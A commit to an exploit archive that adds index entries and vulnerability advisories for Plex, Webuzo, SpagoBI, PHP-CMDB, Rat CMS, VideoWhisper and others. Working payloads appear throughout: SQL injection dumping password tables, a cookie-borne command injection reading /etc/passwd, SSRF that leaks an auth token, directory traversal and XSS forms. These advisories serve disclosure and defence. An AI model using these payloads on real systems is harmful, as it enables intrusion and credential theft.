Updated 03_02_2014

Offensive Security 2014-03-02 04:29:43 +00:00
parent 37e7d441f8
commit d02449c714
17 changed files with 1256 additions and 0 deletions


@ -28753,3 +28753,19 @@ id,file,description,date,author,platform,type,port
31966,platforms/linux/dos/31966.c,"Linux Kernel utrace and ptrace Local Denial of Service Vulnerability (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0
31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway 'PARAMS' Parameter Cross-Site Scripting Vulnerability",2008-06-26,"Erez Metula",asp,webapps,0
31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service Vulnerability",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80
31972,platforms/windows/local/31972.py,"GoldMP4Player 3.3 - Buffer Overflow Exploit (SEH)",2014-02-28,metacom,windows,local,0
31975,platforms/php/webapps/31975.txt,"The Rat CMS viewarticle.php Multiple Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0
31976,platforms/php/webapps/31976.txt,"The Rat CMS viewarticle2.php id Parameter XSS",2008-06-26,"CWH Underground",php,webapps,0
31977,platforms/php/webapps/31977.txt,"The Rat CMS viewarticle.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0
31978,platforms/php/webapps/31978.txt,"The Rat CMS viewarticle2.php id Parameter SQL Injection",2008-06-26,"CWH Underground",php,webapps,0
31979,platforms/linux/dos/31979.html,"GNOME Evolution 2.22.2 'html_engine_get_view_width()' Denial Of Service Vulnerability",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
31980,platforms/windows/remote/31980.html,"UUSee 2008 UUUpgrade ActiveX Control 'Update' Method Arbitrary File Download Vulnerability",2008-06-26,Symantec,windows,remote,0
31981,platforms/php/webapps/31981.txt,"PolyPager 0.9.51/1.0 'nr' Parameter Cross Site Scripting Vulnerability",2008-06-26,"CWH Underground",php,webapps,0
31982,platforms/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,php,webapps,80
31983,platforms/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400
31985,platforms/hardware/webapps/31985.txt,"MICROSENS Profi Line Switch 10.3.1 - Privilege Escalation",2014-02-28,"SEC Consult",hardware,webapps,0
31986,platforms/php/webapps/31986.txt,"Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80
31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,metasploit,windows,remote,80
31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow",2014-02-28,metasploit,windows,local,0
31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation Vulnerability",2014-02-28,"Christian Catalano",multiple,webapps,0
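Review bot: the port column is filled inconsistently across the new webapps rows: 31983 (Plex) records 32400 and 31970, 31982 and 31986 record 80, while 31985 (MICROSENS Web Manager) and 31990 (SpagoBI) record 0 even though both are reached through a web interface; either fill in the port for every webapps row or reserve 0 for cases where it is genuinely unknown, so that filters on this column behave predictably. Minor: 31986 spells the platform "Wordpress" where the product name is "WordPress".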


@ -0,0 +1,143 @@
SEC Consult Vulnerability Lab Security Advisory < 20140228-0 >
=======================================================================
title: Privilege escalation vulnerability
product: MICROSENS Profi Line Modular Industrial Switch Web
Manager (MS652119PM)
vulnerable version: Firmware version 10.3.1
fixed version: Firmware version 10.3.2
impact: High
homepage: http://www.microsens.com/profi-line-modular/
found: 2013-08-21
by: Christian Kudera, Stefan Riegler
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"The new Profi Line Modular switches, from MICROSENS, offer maximum
performance and flexibility in smallest spaces. Robust, modular, expandable
and designed for greatest reliability and shortest recovery times, the Profi
Line Modular series has become the first-choice solution for Industrial
Ethernet."
Source: http://www.microsens.com/profi-line-modular/
Business recommendation:
------------------------
SEC Consult has identified a privilege escalation in the MICROSENS Web Manager
in the course of a very limited infrastructure audit. Very little time was
spent on the affected product.
The Web Manager can be used with read only permission to check the
configuration on the device (e.g. VLANs, Port status). Additionally the Web
Manager can be used with read and write permission to configure the device.
Using the identified vulnerability a low privileged user having read only
permission can elevate his privileges to contain read and write permissions.
Vulnerability overview/description:
-----------------------------------
The Web Manager contains a login form to authenticate a user. The Web Manager
offers different levels of privilege (e.g. read only permission, read and
write permission, debugging permission).
The login attempt is checked through a CGI binary, but the response of the
binary is validated at the client side via JavaScript. An attacker can
intercept and modify the response of the binary, thus achieving authentication
and the desired level of authorization. No further validation is performed by
the Web Manager.
Proof of concept:
-----------------
The login generates the following request to the server:
interf=WEB&bidx=1&unam=root&pawo=&plev=0
This request triggers a CGI binary, which validates the login attempt and
returns the following response:
<xml>
<!-- last change: 17.04.2012 -->
<!-- returned at uptime of 141056 seconds -->
<header>
<version>V0.1</version>
<user>XYZ</user>
<date>2012/05/29 17:28:00</date>
</header>
<response>
<par name="cmd" type="STRING" >
<val>login</val>
</par>
<par name="result" type="UNSIGNED" >
<val>255</val>
</par>
<par name="lunam" type="STRING" >
<val>root</val>
</par>
<par name="liid" type="STRING" >
<val>0</val>
</par>
<par name="rhost" type="STRING" >
<val>192.10.100.136</val>
</par>
<par name="a_s_b" type="STRING" >
<val>0_0_1</val>
</par>
</response>
</xml>
The parameter "result" informs the client about the properness of the provided
login credentials.
The parameter can correspond to the following values:
255 login failed
1 login with read only permission
2 login with read and write permission
3 login with debugging permission
For example, if the value of the parameter "result" is changed to 3, the user
gets logged in with debugging permissions.
Vendor contact timeline:
------------------------
2013-09-10: Contacting vendor
2013-09-11: Sending advisory and proof of concept exploit via encrypted
channel.
2013-09-11: Vendor acknowledges receipt of advisory.
2013-10-18: Vendor responds and wants to release update on 2013-10-31.
2013-10-31: MICROSENS releases fixed version.
2014-02-07: Conference call: Clarifying pending questions regarding the fixed
version.
2014-02-28: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to the most recent firmware version 10.3.2
Workaround:
-----------
All accounts with read only permissions should be disabled on the device.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to career (at) sec-consult (dot) com [email concealed]
EOF Christian Kudera / @2014
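Review bot: the Solution section ("Update to the most recent firmware version 10.3.2") and the 2014-02-07 timeline entry about clarifying the fixed version never say what 10.3.2 actually changes. Since the root cause stated under "Vulnerability overview" is that the CGI login result is validated only client-side in JavaScript, one sentence confirming that the fixed firmware enforces the privilege level server-side would let readers verify the fix instead of trusting the version number. The Workaround ("All accounts with read only permissions should be disabled on the device") would also be clearer with its rationale: the escalation starts from any read-only login, so removing that tier removes the precondition.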

platforms/linux/dos/31979.html Executable file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29961/info
GNOME Evolution is prone to a denial-of-service vulnerability when handling email messages that contain specially crafted HTML.
Successful attacks will crash the application.
Evolution 2.22.2 is vulnerable; other versions may also be affected.
<IFRAME SRC="A"></IFRAME> <FRAMESET><FRAME SRC="A"></FRAMESET>


@ -0,0 +1,146 @@
SEC Consult Vulnerability Lab Security Advisory < 20140228-1 >
=======================================================================
title: Authentication bypass (SSRF) and local file disclosure
product: Plex Media Server
vulnerable version: <=0.9.9.2.374-aa23a69
fixed version: >=0.9.9.3
impact: Critical
homepage: http://www.plex.tv
found: 2014-02-06
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor/product description:
-----------------------------
"Plex is a media player system consisting of a player application with a
10-foot user interface and an associated media server. It is available for
Mac OS X, Linux, and Microsoft Windows."
URL: https://en.wikipedia.org/wiki/Plex_(software)
Vulnerability overview/description:
-----------------------------------
1. Authentication bypass / Server Side Request Forgery (SSRF)
The Plex Media Server "/system/proxy" functionality fails to properly validate
pre-authentication user requests. This allows unauthenticated attackers to make
the Plex Media Server execute arbitrary HTTP requests.
By requesting content from 127.0.0.1 an attacker can bypass all authentication
and execute commands with administrative privileges.
2. Unauthenticated local file disclosure
Because of insufficient input validation, arbitrary local files can be
disclosed. Files that include passwords and other sensitive information can
be accessed.
Plex "Remote" servers (thousands of them can be found via Shodan and Google,
none of them were accessed) are affected by both vulnerabilities as well.
Proof of concept:
-----------------
1. Authentication bypass / Server Side Request Forgery (SSRF)
The following GET request bypasses the webserver whitelist.
GET /system/proxy HTTP/1.1
Host: <PLEX_WAN_HOST>
X-Plex-Url: http://localhost:32400/myplex/account?IRRELEVANT=
X-Plex-Url: http://my.plexapp.com/
The last X-Plex-Url header value "http://my.plexapp.com/" is contained in
the whitelist (Regex) and passes validation. The request is then processed by
the actual request handler in the backend webserver (Python). Here both header
values are concatenated using a comma. This way the actual URL that is
requested is controlled by the first X-Plex-Url value.
By indicating a parameter (called IRRELEVANT) the second X-Plex-Url value is
dissolved.
This results in the following request (made by Plex Media Server):
GET /myplex/account?IRRELEVANT=,http://my.plexapp.com/ HTTP/1.1
Host: localhost:32400
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729)
Connection: close
Accept: */*
Accept-Encoding: gzip
The response for this request is passed to the attacker and includes the
authToken value ("master token"), which can be used to impersonate legitimate
Plex users. Of course other administrative actions can be performed as well.
<?xml version="1.0" encoding="UTF-8"?>
<MyPlex authToken="<REMOVED>" username="<REMOVED>" mappingState="mapped" mappingError="" mappingErrorMessage="1" signInState="ok" publicAddress="1" publicPort="9415" privateAddress="1" privatePort="32400" subscriptionFeatures="cloudsync,pass,sync" subscriptionActive="1" subscriptionState="Active">
</MyPlex>
A video demonstrating this issue has been released by SEC Consult:
http://www.youtube.com/watch?v=f99fm4QU9u8
2. Unauthenticated local file disclosure
The following requests show different functionality that is vulnerable to
directory traversal:
GET /manage/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>
GET /web/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>
GET /:/resources/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1
Host: <HOST>
The /manage/ and /web/ handlers can be exploited without prior authentication.
This vulnerability was confirmed on Windows.
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Plex Media Server version
0.9.9.2.374-aa23a69.
Vendor contact timeline:
------------------------
2014-02-09: Contacting vendor through elan (at) plexapp (dot) com [email concealed] and requesting
encryption keys.
2014-02-10: Vendor provides encryption keys.
2014-02-10: Sending advisory and proof of concept exploit.
2014-02-10: Vendor acknowledges receipt of advisory.
2014-02-17: Requesting status update.
2014-02-17: Vendor provides release timeline.
2014-02-20: Vendor releases fixed version (0.9.9.3).
2014-02-21: Requesting clarification regarding fixed version.
2014-02-21: Vendors provides further information about fixed version and
other reported vulnerabilities.
2014-02-28: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to a more recent version of Plex Media Server (eg. 0.9.9.5).
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to career (at) sec-consult (dot) com [email concealed]
EOF Stefan Viehböck / @2014
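Review bot: "Workaround: No workaround available" understates what the advisory's own text supports. Both issues are reachable without authentication over plain HTTP, and the "Remote" paragraph notes that thousands of Internet-exposed instances are affected, so restricting who can reach the server until 0.9.9.3 or later is installed is a workaround worth listing. Two smaller points: the Solution says "eg. 0.9.9.5" while the header gives the fixed version as ">=0.9.9.3", so one reference version should be chosen; and "Vendors provides" in the 2014-02-21 entry should read "Vendor provides".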


@ -0,0 +1,121 @@
###################################################
01. ### Advisory Information ###
Title: Remote Privilege Escalation in SpagoBI
Date published: 2013-02-28
Date of last update: 2013-02-28
Vendors contacted: Engineering Group
Discovered by: Christian Catalano
Severity: High
02. ### Vulnerability Information ###
CVE reference: CVE-2013-6231
CVSS v2 Base Score: 9
CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Component/s: SpagoBI
Class: Input Manipulation
03. ### Introduction ###
SpagoBI[1] is an Open Source Business Intelligence suite, belonging to
the free/open source SpagoWorld initiative, founded and supported by
Engineering Group[2].
It offers a large range of analytical functions, a highly functional
semantic layer often absent in other open source platforms and projects,
and a respectable set of advanced data visualization features including
geospatial analytics.[3]
SpagoBI is released under the Mozilla Public License, allowing its
commercial use.
SpagoBI is hosted on OW2 Forge[4] managed by OW2 Consortium, an
independent open-source software community.
[1] - http://www.spagobi.org
[2] - http://www.eng.it
[3] -
http://www.spagoworld.org/xwiki/bin/view/SpagoBI/PressRoom?id=SpagoBI-ForresterWave-July2012
[4] - http://forge.ow2.org/projects/spagobi
04. ### Vulnerability Description ###
SpagoBI contains a flaw that leads to unauthorized privileges being
gained. The issue is triggered when the servlet (action):
AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION is executed with specifically
crafted input, and may allow a remote attacker to gain Administrator
role privileges.
05. ### Technical Description / Proof of Concept Code ###
An attacker (a SpagoBI malicious Business User with RSM role ) can
invoke via URL the servlet (action):
AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION
to gain SpagoBI Administrator privilege.
To reproduce the vulnerability follow the provided information and
steps below:
- Using a browser log on to SpagoBI with restricted account (e.g.
Business User Account)
- Execute:
https://localhost/SpagoBI/servlet/AdapterHTTP?ACTION_NAME=MANAGE_USER_ACTION
- Select your account from Users List
- Select Administrator Role from Roles tab and save it
Remote Privilege Escalation Attack has been successfully completed!
06. ### Business Impact ###
Successful exploitation of the vulnerability may allow a remote,
authenticated attacker to elevate privileges and obtain full access to
the affected system.
The attacker could exploit the vulnerability to become administrator
and retrieve or publish any kind of data.
07. ### Systems Affected ###
This vulnerability was tested against: SpagoBI 4.0
Older versions are probably affected too, but they were not checked.
08. ### Vendor Information, Solutions and Workarounds ###
This issue is fixed in SpagoBI v4.1, which can be downloaded from:
http://forge.ow2.org/project/showfiles.php?group_id=204
Fixed by vendor [verified]
09. ### Credits ###
This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
10. ### Vulnerability History ###
October 08th, 2013: Vulnerability identification
October 22th, 2013: Vendor notification to [SpagoBI Team]
November 05th, 2013: Vendor Response/Feedback from [SpagoBI Team]
December 16th, 2013: Vendor Fix/Patch [SpagoBI Team]
January 16th, 2014: Fix/Patch Verified
February 28th, 2014: Vulnerability disclosure
11. ### Disclaimer ###
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
###################################################
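Review bot: "Date published: 2013-02-28" and "Date of last update: 2013-02-28" in section 01 conflict with section 10, which places identification in October 2013 and disclosure on February 28th, 2014, and with the CSV row date 2014-02-28; the year in section 01 should be 2014. Also "October 22th" should be "October 22nd", and section 07 would be more useful if it repeated the precondition from section 05 (an authenticated account holding the RSM role), since the CVSS vector's Au:S depends on it.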

platforms/php/webapps/31970.txt Executable file

@ -0,0 +1,77 @@
# ==============================================================
# Title ...| Multiple vulnerabilities in PHP-CMDB
# Version .| php-cmdb_0.7.3
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================
[+] From admin logged-in
# ==============================================================
# 1. XSS in SQL error
---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 57
s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_form=1
---<request>---
---<response>---
<td colspan='2' class='c_attr r_attr'>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"><body/onload=alert(9999)>%' AND ci_cit_id=cit_id ORDER BY ci_title, cit_title' at line 1</td>
</tr>
---<response>---
Same parameter seems to be vulnerable to SQL Injection attack.
("The used SELECT statements have a different number of columns")
# ==============================================================
# 2. XSS
---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/ci_create.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 93
ci_id=0&ci_clone_id=0&ci_icon='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&ci_form=1&ci_cit_id=0
---<request>---
# ==============================================================
# 3. XSS /SQLi
---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/search_advanced.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 100
s_form=2&s_text='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&s_cit_id=0&s_cat_id=0&s_compare_operator=0
---<request>---
# ==============================================================
# 4. XSS / SQLi
---<request>---
POST /k/cms/php-cmdb/php-cmdb_0.7.3/www/u_create_run.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 153
u_id=0&u_form=1&u_login='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&u_active=1&u_last_name=tester&u_first_name=tester&u_role_id=1&u_email=&u_auth_backend=0
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
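Review bot: the header's "Home ....|" field is empty and there is no vendor-contact or fix status, so a reader cannot tell whether 0.7.3 is current or whether the vendor was notified. "[+] From admin logged-in" states that all four requests were issued from an authenticated admin session, which the CSV description "Multiple Vulnerabilities" does not convey; the authentication precondition belongs in the header. The SQL injection claim in item 1 rests on the database error text alone ("Same parameter seems to be vulnerable..."), so marking it as unconfirmed would be accurate.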

platforms/php/webapps/31975.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29959/info
The Rat CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Rat CMS Pre-Alpha 2 is vulnerable; other versions may also be affected.
http://www.example.com/[trcms_path]/viewarticle.php/<XSS>
http://www.example.com/[trcms_path]/viewarticle.php?id=<XSS>
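Review bot: the four Rat CMS entries (31975 to 31978) share this identical four-line description, and each states the affected release is "Pre-Alpha 2" while the corresponding CSV rows carry no version; adding the version to the CSV descriptions, as the 2014 rows do, would make the entries searchable by release. Also, the first URL ("viewarticle.php/<XSS>") concerns a path-info value rather than a query parameter, so the CSV title "Multiple Parameter XSS" should be checked against what the file actually documents.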


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29959/info
The Rat CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Rat CMS Pre-Alpha 2 is vulnerable; other versions may also be affected.
http://www.example.com/[trcms_path]/viewarticle2.php?id=<XSS>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29959/info
The Rat CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Rat CMS Pre-Alpha 2 is vulnerable; other versions may also be affected.
http://www.example.com/[trcms_path]/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29959/info
The Rat CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Rat CMS Pre-Alpha 2 is vulnerable; other versions may also be affected.
http://www.example.com/[trcms_path]/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29975/info
PolyPager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PolyPager 1.0rc2 and prior versions are vulnerable.
http://www.example.com/polypager/?[Web Page]&nr=[XSS]

platforms/php/webapps/31982.txt Executable file

@ -0,0 +1,78 @@
?# Exploit Title: Webuzo Multiple Vulnerabilities
# Date: 7 October 2013
# Exploit Author: Mahendra
# Vendor Homepage: www.webuzo.com
# Software Link: http://downloads.webuzo.com/va.php
# Version: 2.1.3, other version might be vulnerable.
# Tested on: CentOS release 6.2 (FINAL)
# CVE : CVE-2013-6041, CVE-2013-6042, CVE-2013-6043
----------------------------------------------------
----------------------------------------------------
*Advisory details*
Webuzo 2.1.3 has been identified with multiple security vulnerabilities, which can be exploited to perform remote OS command injection, execute malicious script and enumerate users.
Authentication is not required to exploit these issues.
*Proof of Concept (PoC)*
----------------------------------------------------
Remote OS Command Injection (Webuzo) - CVE-2013-6041
----------------------------------------------------
GET /index.php?act=login HTTP/1.1
Host: xx.xx.xx.xx:2002
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SOFTCookies7972_sid=[this is your cookie value]`cat /etc/passwd > /home/admin/public_html/pwned.html`
Connection: keep-alive
Cache-Control: max-age=0
--------------------------------------------------------------------
Reflected Cross-site scripting (File Manager module) - CVE-2013-6042
--------------------------------------------------------------------
Eventhough the user parameter is not validated properly which resulted in XSS, there are sets of security protection in place provided by vendor. There is security token which randomly generated, however the token is passed via URL and HTTPS is not enforced by default. The vendor also claims that the token is assigned only to a particular IP address which will logout the user if the token is used by another IP address.
This issue can be considered as informational or very low risk issue depending on the environment setup and method used by attacker to obtain the token.
HTTP Request : POST
Affected parameter : user
URL/page : /filemanager/login.php
Payload : 1" onmouseover=alert(document.cookie) pwned="
POST /sesseisbp4bciukbenlo/filemanager/login.php HTTP/1.1
Host: xx.xx.xx.xx:2002
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx:2002/sesseisbp4bciukbenlo/filemanager/login.php
Cookie: navphp=ajax; navphp_cols=9; catforums=2; catblogs=2; catwikis=2; catcalendars=2; catgames=2; catmail=2; catpolls=2; catfiles=2; SOFTCookies7972_sid=eisbp4bciukbenlouewpgmwjlgchervf; PHPSESSID=28u75itaq1gob5it0lfb7cesg5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
user=1"+onmouseover=alert(document.cookie)+pwned="&passwd=asd&action=Login
----------------------------------------------------
Username enumeration - CVE-2013-6043
----------------------------------------------------
1. Valid username and invalid password -> application returns “The username and password you entered is incorrect”
2. Invalid username and password -> application returns “The Webuzo username you entered is invalid"
*Advisory Timeline*
02-10-2013: Vendor notified
02-10-2013: Vendor acknowledged issues.
03-10-2013: Vendor released new version 2.1.4 - http://www.softaculous.com/board/index.php?tid=4526&title=Webuzo_2.1.4_Launched
10-10:2013: This advisory is published
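Review bot: the leading "?#" on the first line looks like a stray byte-order mark rendered as "?" and should be stripped so the header comment parses like the others. The timeline entry "10-10:2013" uses a colon where the other entries use a hyphen, and the header lists no fixed version even though the 03-10-2013 entry says 2.1.4 resolved the issues; a "Fixed version: 2.1.4" header line would save readers a trip to the vendor forum. The header "Date: 7 October 2013" also disagrees with the timeline's publication date of 10-10-2013.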

platforms/php/webapps/31986.txt Executable file

@ -0,0 +1,190 @@
Advisory ID: HTB23199
Product: VideoWhisper Live Streaming Integration
Vendor: VideoWhisper
Vulnerable Version(s): 4.27.3 and probably prior
Tested Version: 4.27.3
Advisory Publication: February 6, 2014 [without technical details]
Vendor Notification: February 6, 2014
Vendor Patch: February 7, 2014
Public Disclosure: February 27, 2014
Vulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211]
CVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908
Risk Level: Critical
CVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files.
1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905
VideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snaps
hots.php". A remote attacker can upload and execute arbitrary PHP file on the target system.
The following PoC code demonstrates exploitation of the vulnerability:
After successful exploitation the remote shell will be accessible via the following URL:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/snapshots/1.php.jpg
Successful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.
2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906
2.1 The vulnerability exists due to insufficient filtration of "m" HTTP POST parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu
s.php" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled pluginâ??s widget. The script will be also executed in administrative section on the following page:
http://[host]/wp-admin/options-general.php?page=videowhisper_streaming.p
hp&tab=live
The exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-int
egration/ls/lb_status.php" method="post">
<input type="hidden" name="s" value="1">
<input type="hidden" name="u" value="1">
<input type="hidden" name="r" value="1">
<input type="hidden" name="m" value="<script>alert('immuniweb')</script>">
</form>
</body>
2.2 The vulnerability exists due to insufficient filtration of "msg" HTTP POST parameter in "/wp-content/plugins/videowhisper-live-streaming-integration/ls/vc_chatl
og.php" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits the affected page.
The exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:
<body onLoad="document.hack.submit()">
<form name="hack" action="http://[host]/wp-content/plugins/videowhisper-live-streaming-int
egration/ls/vc_chatlog.php" method="post">
<input type="hidden" name="msg" value="<script>alert('immuniweb')</script>">
<input type="hidden" name="r" value="1">
</form>
</body>
The code will be executed when the user visits the following URL:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/uploads/[room]/Log[date].html
Where [room] is set by HTTP POST parameter r and [date] is the current date.
2.3 The vulnerabilities exist due to insufficient filtration of "n" HTTP GET parameter passed to scripts "channel.php", "htmlchat.php", "video.php" and "videotext.php" within the "/wp-content/plugins/videowhisper-live-streaming-integration/ls/" directory. A remote attacker can send a specially crafted HTTP GET request to vulnerable scripts and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation examples below use the "alert()" JavaScript function to display "immuniweb" word:
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/channel.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3
E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/htmlchat.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%
3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
/ls/video.php?n=%3C/title%3E%3Cscript%3Ealert('immuniweb')%3C/script%3E
http://[host]/wp-content/plugins/videowhisper-live-streaming-integration
